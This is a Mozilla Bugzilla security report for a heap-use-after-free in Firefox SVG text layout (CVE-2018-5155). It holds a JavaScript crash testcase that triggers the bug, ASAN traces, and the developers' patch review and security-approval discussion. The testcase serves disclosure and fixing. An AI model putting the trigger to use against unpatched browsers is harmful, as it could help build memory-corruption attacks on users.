Bug 1448774 (CVE-2018-5155)

heap-use-after-free in mozilla::CharIterator::GetOriginalGlyphOffsets

VERIFIED FIXED in Firefox -esr52

Status

()

defect
VERIFIED FIXED
a year ago
8 months ago

People

(Reporter: nils, Assigned: longsonr)

Tracking

({csectype-uaf, sec-high})

61 Branch
mozilla61
Points:
---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr5260+ verified, firefox59 wontfix, firefox60+ verified, firefox61+ verified)

Details

(Whiteboard: [adv-main60+][adv-esr52.8+])

Attachments

(6 attachments, 1 obsolete attachment)

(Reporter)

Description

a year ago
Posted image svg.svg
The following testcase crashes the latest ASAN build of Firefox 61.0a1 (SourceStamp=b4aeb99d1cb601e5a5288ca05630913fa8528a1c). It requires the attached svg.svg in the same directory.

crash.html:
<script>
function start() {
	o100=window.open('svg.svg','p58','height=6');
	o100.onload=fun0;
	setTimeout(fun1, 400);
}
function fun0(e) {
	o101=e.target;;
	o109=o101.getElementById('id1');
	o120=o101.getElementById('id8');
}
function fun1() {
	o167=o109.ownerDocument;
	o168=document.createElement('head');
	o167.documentElement.appendChild(o168);
	o120.setAttribute('width','393216');
	o206=document.createElement('head');
	o167.documentElement.appendChild(o206);
	o207=document.createElement('style');
	o206.appendChild(o207);
	o207.textContent="*{ -moz-transition: 235ms; -moz-border-end-color: green; border-right-style: inset";
	setTimeout(fun2,240);
}
function fun2() {
	o120.setAttribute('viewBox','0 0 1000 1000');
	o5=document.createElement("div");
	o5.innerHTML="<svg height='10px' xmlns='http://www.w3.org/2000/svg'><set attributeName='font-weight'><style>*{{}}*{ background-position-x: 1px";
	o168.innerHTML=o5.innerHTML;
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==15139==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000131768 at pc 0x7fa844a5c5d0 bp 0x7ffdd01c31d0 sp 0x7ffdd01c31c8
READ of size 8 at 0x612000131768 thread T0 (file:// Content)
    #0 0x7fa844a5c5cf in IsClusterStart /builds/worker/workspace/build/src/obj-firefox/dist/include/gfxTextRun.h:113:16
    #1 0x7fa844a5c5cf in mozilla::CharIterator::GetOriginalGlyphOffsets(unsigned int&, unsigned int&) const /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:2596
    #2 0x7fa844a5c6ea in mozilla::CharIterator::GetGlyphAdvance(nsPresContext*) const /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:2618:3
    #3 0x7fa844a7bfee in SVGTextFrame::DoTextPathLayout() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5108:12
    #4 0x7fa844a7fdb5 in SVGTextFrame::DoGlyphPositioning() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5365:3
    #5 0x7fa844a82ce8 in UpdateGlyphPositioning /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5433:5
    #6 0x7fa844a82ce8 in SVGTextFrame::TransformFrameRectFromTextChild(nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5734
    #7 0x7fa844528b3c in nsLayoutUtils::TransformFrameRectToAncestor(nsIFrame*, nsRect const&, nsIFrame const*, bool*, mozilla::Maybe<mozilla::gfx::Matrix4x4TypedFlagged<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> >*, bool, nsIFrame**) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3139:27
    #8 0x7fa84472631a in IsFrameScrolledOutOfView(nsIFrame*, nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11026:5
    #9 0x7fa844726190 in nsIFrame::IsScrolledOutOfView() /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11057:10
    #10 0x7fa83ef594a8 in mozilla::dom::KeyframeEffectReadOnly::CanThrottle() const /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1172:16
    #11 0x7fa83ef345d2 in mozilla::dom::KeyframeEffectReadOnly::NotifyAnimationTimingUpdated() /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:134:7
    #12 0x7fa83ef32775 in mozilla::dom::Animation::UpdateTiming(mozilla::dom::Animation::SeekFlag, mozilla::dom::Animation::SyncNotifyFlag) /builds/worker/workspace/build/src/dom/animation/Animation.cpp:1346:3
    #13 0x7fa83ef2c0f1 in mozilla::dom::Animation::Tick() /builds/worker/workspace/build/src/dom/animation/Animation.cpp:699:3
    #14 0x7fa844382440 in mozilla::dom::CSSTransition::Tick() /builds/worker/workspace/build/src/layout/style/nsTransitionManager.cpp:337:14
    #15 0x7fa83ef44afe in mozilla::dom::DocumentTimeline::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/animation/DocumentTimeline.cpp:184:16
    #16 0x7fa844396517 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1884:12
    #17 0x7fa8443a6a00 in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:338:13
    #18 0x7fa8443a6a00 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:308
    #19 0x7fa8443a65c6 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:330:5
    #20 0x7fa8443a933e in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:771:5
    #21 0x7fa8443a933e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:684
    #22 0x7fa8443a8f3e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:585:9
    #23 0x7fa844c56e9f in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #24 0x7fa83d7cc550 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:156:20
    #25 0x7fa83d6b73d4 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1968:28
    #26 0x7fa83d25583e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2135:25
    #27 0x7fa83d2527c1 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2065:17
    #28 0x7fa83d253fbc in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1911:5
    #29 0x7fa83d254618 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1944:15
    #30 0x7fa83c382568 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1096:14
    #31 0x7fa83c39e8d0 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:519:10
    #32 0x7fa83d25d396 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:125:5
    #33 0x7fa83d1b08a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #34 0x7fa83d1b08a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #35 0x7fa83d1b08a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #36 0x7fa843e3379a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #37 0x7fa8480e478b in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:893:22
    #38 0x7fa83d1b08a9 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #39 0x7fa83d1b08a9 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #40 0x7fa83d1b08a9 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #41 0x7fa8480e416a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:719:34
    #42 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #43 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #44 0x7fa85c0be82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #45 0x420f48 in _start (/fuzzer3/firefox/firefox+0x420f48)

0x612000131768 is located 40 bytes inside of 288-byte region [0x612000131740,0x612000131860)
freed by thread T0 (file:// Content) here:
    #0 0x4c1952 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7fa8448e7b61 in ClearTextRuns /builds/worker/workspace/build/src/layout/generic/nsTextFrame.h:626:5
    #2 0x7fa8448e7b61 in nsTextFrame::MarkIntrinsicISizesDirty() /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8530
    #3 0x7fa8443eeb38 in mozilla::PresShell::FrameNeedsReflow(nsIFrame*, nsIPresShell::IntrinsicDirty, nsFrameState, nsIPresShell::ReflowRootHandling) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:2797:18
    #4 0x7fa84443f14d in StyleChangeReflow /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1234:26
    #5 0x7fa84443f14d in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1559
    #6 0x7fa84444d8f5 in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1188:9
    #7 0x7fa844406ffd in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1264:3
    #8 0x7fa844406ffd in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:43
    #9 0x7fa844406ffd in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4259
    #10 0x7fa83f3e33c8 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
    #11 0x7fa83f3e33c8 in nsIDocument::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:7649
    #12 0x7fa8438218af in nsSMILAnimationController::DoSample(bool) /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.cpp:440:15
    #13 0x7fa84337257b in Resample /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.h:74:21
    #14 0x7fa84337257b in FlushResampleRequests /builds/worker/workspace/build/src/dom/smil/nsSMILAnimationController.h:90
    #15 0x7fa84337257b in FlushAnimations /builds/worker/workspace/build/src/dom/svg/nsSVGElement.cpp:2677
    #16 0x7fa84337257b in nsSVGEnum::DOMAnimatedEnum::AnimVal() /builds/worker/workspace/build/src/dom/svg/nsSVGEnum.h:97
    #17 0x7fa844a7bf5d in SVGTextFrame::DoTextPathLayout() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5099:31
    #18 0x7fa844a7fdb5 in SVGTextFrame::DoGlyphPositioning() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5365:3
    #19 0x7fa844a82ce8 in UpdateGlyphPositioning /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5433:5
    #20 0x7fa844a82ce8 in SVGTextFrame::TransformFrameRectFromTextChild(nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5734
    #21 0x7fa844528b3c in nsLayoutUtils::TransformFrameRectToAncestor(nsIFrame*, nsRect const&, nsIFrame const*, bool*, mozilla::Maybe<mozilla::gfx::Matrix4x4TypedFlagged<mozilla::gfx::UnknownUnits, mozilla::gfx::UnknownUnits> >*, bool, nsIFrame**) /builds/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3139:27
    #22 0x7fa84472631a in IsFrameScrolledOutOfView(nsIFrame*, nsRect const&, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11026:5
    #23 0x7fa844726190 in nsIFrame::IsScrolledOutOfView() /builds/worker/workspace/build/src/layout/generic/nsFrame.cpp:11057:10
    #24 0x7fa83ef594a8 in mozilla::dom::KeyframeEffectReadOnly::CanThrottle() const /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:1172:16
    #25 0x7fa83ef345d2 in mozilla::dom::KeyframeEffectReadOnly::NotifyAnimationTimingUpdated() /builds/worker/workspace/build/src/dom/animation/KeyframeEffectReadOnly.cpp:134:7
    #26 0x7fa83ef32775 in mozilla::dom::Animation::UpdateTiming(mozilla::dom::Animation::SeekFlag, mozilla::dom::Animation::SyncNotifyFlag) /builds/worker/workspace/build/src/dom/animation/Animation.cpp:1346:3
    #27 0x7fa83ef2c0f1 in mozilla::dom::Animation::Tick() /builds/worker/workspace/build/src/dom/animation/Animation.cpp:699:3
    #28 0x7fa844382440 in mozilla::dom::CSSTransition::Tick() /builds/worker/workspace/build/src/layout/style/nsTransitionManager.cpp:337:14
    #29 0x7fa83ef44afe in mozilla::dom::DocumentTimeline::WillRefresh(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/animation/DocumentTimeline.cpp:184:16
    #30 0x7fa844396517 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1884:12
    #31 0x7fa8443a6a00 in TickDriver /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:338:13
    #32 0x7fa8443a6a00 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:308
    #33 0x7fa8443a65c6 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:330:5
    #34 0x7fa8443a933e in RunRefreshDrivers /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:771:5
    #35 0x7fa8443a933e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:684
    #36 0x7fa8443a8f3e in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:585:9
    #37 0x7fa844c56e9f in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /builds/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:68:16
    #38 0x7fa83d7cc550 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:156:20
    #39 0x7fa83d6b73d4 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1968:28
    #40 0x7fa83d25583e in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2135:25

previously allocated by thread T0 (file:// Content) here:
    #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x7fa83ec6d177 in gfxTextRun::AllocateStorageForTextRun(unsigned long, unsigned int) /builds/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:128:21
    #2 0x7fa8448a771a in Create /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:51:19
    #3 0x7fa8448a771a in MakeTextRun /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:114
    #4 0x7fa8448a771a in nsTransformingTextRunFactory::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, gfxFontGroup*, mozilla::gfx::ShapedTextFlags, nsTextFrameUtils::Flags, nsTArray<RefPtr<nsTransformedCharStyle> >&&, bool) /builds/worker/workspace/build/src/layout/generic/nsTextRunTransformations.cpp:131
    #5 0x7fa8448a1fb7 in BuildTextRunsScanner::BuildTextRunForFrames(void*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2396:38
    #6 0x7fa84489b718 in BuildTextRunsScanner::FlushFrames(bool, bool) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1699:17
    #7 0x7fa8448ac9a7 in BuildTextRuns /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1625:11
    #8 0x7fa8448ac9a7 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2864
    #9 0x7fa8448eadac in nsTextFrame::AddInlinePrefISizeForFlow(gfxContext*, nsIFrame::InlinePrefISizeData*, nsTextFrame::TextRunType) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8728:5
    #10 0x7fa8448ecafa in nsTextFrame::AddInlinePrefISize(gfxContext*, nsIFrame::InlinePrefISizeData*) /builds/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8864:10
    #11 0x7fa84462c5fe in nsBlockFrame::GetPrefISize(gfxContext*) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:860:16
    #12 0x7fa844a80936 in SVGTextFrame::DoReflow() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5520:29
    #13 0x7fa844a67e96 in MaybeReflowAnonymousBlockChild /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:5475:5
    #14 0x7fa844a67e96 in SVGTextFrame::ReflowSVG() /builds/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:3772
    #15 0x7fa844a68fc9 in nsSVGDisplayContainerFrame::ReflowSVG() /builds/worker/workspace/build/src/layout/svg/nsSVGContainerFrame.cpp:350:17
    #16 0x7fa844ace528 in nsSVGOuterSVGFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/svg/nsSVGOuterSVGFrame.cpp:455:14
    #17 0x7fa844694f76 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:940:14
    #18 0x7fa8446937bd in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:713:5
    #19 0x7fa844694f76 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:940:14
    #20 0x7fa844770818 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:554:3
    #21 0x7fa844771c39 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:677:3
    #22 0x7fa844775c18 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1054:3
    #23 0x7fa84461551e in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:984:14
    #24 0x7fa844614099 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /builds/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:335:7
    #25 0x7fa8443f3681 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:8838:11
    #26 0x7fa8444090d0 in mozilla::PresShell::ProcessReflowCommands(bool) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:9011:24
    #27 0x7fa8444074f3 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4309:11
    #28 0x7fa844396ecd in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:579:5
    #29 0x7fa844396ecd in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1939
    #30 0x7fa8443a1354 in nsRefreshDriver::FinishedWaitingForTransaction() /builds/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2163:5
    #31 0x7fa83e9422b3 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:532:32
    #32 0x7fa8436ffd1b in mozilla::dom::TabChild::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/dom/ipc/TabChild.cpp:3127:7
    #33 0x7fa83ea3449a in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&, unsigned long const&, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /builds/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:548:14
    #34 0x7fa83d9f9e09 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1401:20

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/gfxTextRun.h:113:16 in IsClusterStart
Shadow bytes around the buggy address:
  0x0c248001e290: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e2a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c248001e2b0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c248001e2c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e2d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
=>0x0c248001e2e0: fa fa fa fa fa fa fa fa fd fd fd fd fd[fd]fd fd
  0x0c248001e2f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e300: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c248001e310: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c248001e320: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c248001e330: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15139==ABORTING
(Reporter)

Comment 1

a year ago
Posted file ASAN output
(Reporter)

Comment 2

a year ago
Group: core-security → layout-core-security
(Assignee)

Comment 3

a year ago
Posted patch patchSplinter Review
Well I copied the lengthAdjust mechanism to get the side attribute but that code was incorrect as it flushed animations. So although this particular exploit was introduced by bug 1446650, it must be possible to create a similar exploit via the lengthadjust attribute too and that exploit would exist in prior releases.
Assignee: nobody → longsonr
Attachment #8962523 - Flags: review?(dholbert)
(Assignee)

Comment 5

a year ago
Attachment #8962555 - Flags: review?(dholbert)
Can you clarify what the patches are doing & why that helps? It looks like you're switching to use EnumAttributes() rather than a direct accessor, but it's not obvious to me what the significance of that is.
Flags: needinfo?(longsonr)
Comment on attachment 8962523 [details] [diff] [review]
patch

Review of attachment 8962523 [details] [diff] [review]:
-----------------------------------------------------------------

I see - thank you.

r=me
Attachment #8962523 - Flags: review?(dholbert) → review+
Comment on attachment 8962555 [details] [diff] [review]
auditing svg layout reveals one other dangerous call

Review of attachment 8962555 [details] [diff] [review]:
-----------------------------------------------------------------

This seems fine; r=me

You might want to shift code between these patches, though, so that one patch is Nightly-only (the textPath "side" stuff) and the other patch has everything else.

(Also, do remember to request sec-approval before landing anything here.)
Attachment #8962555 - Flags: review?(dholbert) → review+
(Assignee)

Comment 10

a year ago
Comment on attachment 8962555 [details] [diff] [review]
auditing svg layout reveals one other dangerous call

bug 1443092 just landed a functionally identical fix for this so it clearly was exploitable. Just the SVGTextFrame changes remain here then.
Attachment #8962555 - Attachment is obsolete: true
(Assignee)

Updated

a year ago
Attachment #8962526 - Attachment description: given sufficient fuzz this should be applicable to beta/ESR releases → patch for all (nightly/beta/ESR)
(Assignee)

Comment 12

a year ago
Comment on attachment 8962526 [details] [diff] [review]
The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)

[Security approval request comment]
How easily could an exploit be constructed based on the patch? I assume fairly easily even though there's no reproducing testcase.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? Would probably land without any checkin comment except for the bug number.

Which older supported branches are affected by this flaw? all of them.

If not all supported branches, which bug introduced the flaw? bug 569722

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? Should apply everywhere

How likely is this patch to cause regressions; how much testing does it need? Highly unlikely. It's straightforward and the same fix functionally as bug 1443092

Note that I've done the auditing requested in bug 1443092 comment 16
Attachment #8962526 - Flags: sec-approval?
(Assignee)

Comment 13

a year ago
Comment on attachment 8963011 [details] [diff] [review]
The parts of the dholbert reviewed patch above that are nightly only

[Security approval request comment]
How easily could an exploit be constructed based on the patch? Presumably pretty easily given that this bug includes a reproducing testcase.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? not really, I'd probably land with just the bug number.

Which older supported branches are affected by this flaw? nightly only

If not all supported branches, which bug introduced the flaw? bug 1446650

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? no backports required, no branches affected

How likely is this patch to cause regressions; how much testing does it need? Highly unlikely to cause regressions (especially as this is a new feature).
Attachment #8963011 - Flags: sec-approval?
(Assignee)

Updated

a year ago
Attachment #8962526 - Attachment description: patch for all (nightly/beta/ESR) → The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)
(Assignee)

Updated

a year ago
Attachment #8963011 - Attachment description: nightly only patch → The parts of the dholbert reviewed patch above that are nightly only
Comment on attachment 8963011 [details] [diff] [review]
The parts of the dholbert reviewed patch above that are nightly only

sec-approval+ for both parts here. Let's make sure the Beta and ESR52 affecting patches get nominations for those branches as well.
Attachment #8963011 - Flags: sec-approval? → sec-approval+
Attachment #8962526 - Flags: sec-approval? → sec-approval+
https://hg.mozilla.org/mozilla-central/rev/edfd9ffbd720
https://hg.mozilla.org/mozilla-central/rev/dd2e77e4957e

Go ahead and do the branch approval requests when you're comfortable doing so :)
Status: NEW → RESOLVED
Last Resolved: a year ago
Flags: needinfo?(longsonr)
Resolution: --- → FIXED
Target Milestone: --- → mozilla61
(Assignee)

Comment 18

a year ago
Comment on attachment 8962526 [details] [diff] [review]
The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)

Approval Request Comment
[Feature/Bug causing the regression]: bug 569722
[User impact if declined]: I think this is an exploitable security issue given how similar this code is to bug 1443092 and this bug's actual exploit
[Is this code covered by automated tests?]: yes
[Has the fix been verified in Nightly?]: yes
[Needs manual test from QE? If yes, steps to reproduce]:  no
[List of other uplifts needed for the feature/fix]: bug 1443092 (although that has already landed)
[Is the change risky?]: no
[Why is the change risky/not risky?]: bug 569722 has automated tests. It's a small targetted fix
[String changes made/needed]: none
Flags: needinfo?(longsonr)
